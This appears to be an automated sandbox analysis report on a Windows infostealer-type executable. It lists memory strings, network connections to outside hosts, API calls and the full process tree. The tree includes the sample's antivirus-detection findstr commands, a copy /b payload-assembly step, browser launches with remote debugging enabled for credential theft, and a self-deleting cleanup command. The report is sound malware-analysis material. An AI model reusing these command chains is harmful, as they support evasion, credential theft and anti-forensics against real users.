Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000011.00000003.2814373758.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808332227.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808790576.0000259801424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808917731.000025980142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808998412.0000259801434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chromecache_473.19.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_473.19.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000011.00000003.2814373758.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808332227.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2810075272.0000259801450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814271540.00002598013B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.instagram.com
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.last.fm/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.messenger.com
Source: 2cc80dabc69f58b6_1.23.dr	String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.office.com
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.tiktok.com/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://www.youtube.com
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49866 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.5:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50135 version: TLS 1.2

Source: C:\Users\user\Desktop\6684V5n83w.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\Desktop\6684V5n83w.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\Desktop\6684V5n83w.exe

Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

0_2_00403883

Source: C:\Users\user\Desktop\6684V5n83w.exe	File created: C:\Windows\QuotedEmily	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	File created: C:\Windows\PopeDating	Jump to behavior
Source: C:\Users\user\Desktop\6684V5n83w.exe	File created: C:\Windows\CmArrive	Jump to behavior

Source: C:\Users\user\Desktop\6684V5n83w.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\6684V5n83w.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\6684V5n83w.exe	Code function: 0_2_004074BB	0_2_004074BB

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\6684V5n83w.exe

Code function: String function: 004062A3 appears 58 times

Source: 6684V5n83w.exe

Static PE information: invalid certificate

Source: 6684V5n83w.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@91/294@29/19

Source: C:\Users\user\Desktop\6684V5n83w.exe

0_2_004044A5

Source: C:\Users\user\Desktop\6684V5n83w.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\Desktop\6684V5n83w.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Focused

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03

Source: C:\Users\user\Desktop\6684V5n83w.exe

File created: C:\Users\user\AppData\Local\Temp\nsm2D78.tmp

Jump to behavior

Source: 6684V5n83w.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\6684V5n83w.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\6684V5n83w.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: srq16pzmy.13.dr, gd2vasr16.13.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 6684V5n83w.exe

ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\6684V5n83w.exe

File read: C:\Users\user\Desktop\6684V5n83w.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\6684V5n83w.exe "C:\Users\user\Desktop\6684V5n83w.exe"
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 330775
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Modules
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "however" Hotel
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 330775\Evans.com + Presentation + Univ + Gmc + Underground + Rd + Burns + Riders + Dp + Finish + Entities + Cleveland 330775\Evans.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Delivering + ..\Wisdom + ..\Spare + ..\Earrings + ..\Grey + ..\Bus + ..\Project l
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com Evans.com l
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2068,i,3099484482751593606,10427139142014003377,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2692 --field-trial-handle=2548,i,2148176420882130604,12860696726209298526,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6860 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7024 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com" & rd /s /q "C:\ProgramData\kno8y" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\6684V5n83w.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 330775	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Modules	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "however" Hotel	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 330775\Evans.com + Presentation + Univ + Gmc + Underground + Rd + Burns + Riders + Dp + Finish + Entities + Cleveland 330775\Evans.com	Jump to behavior
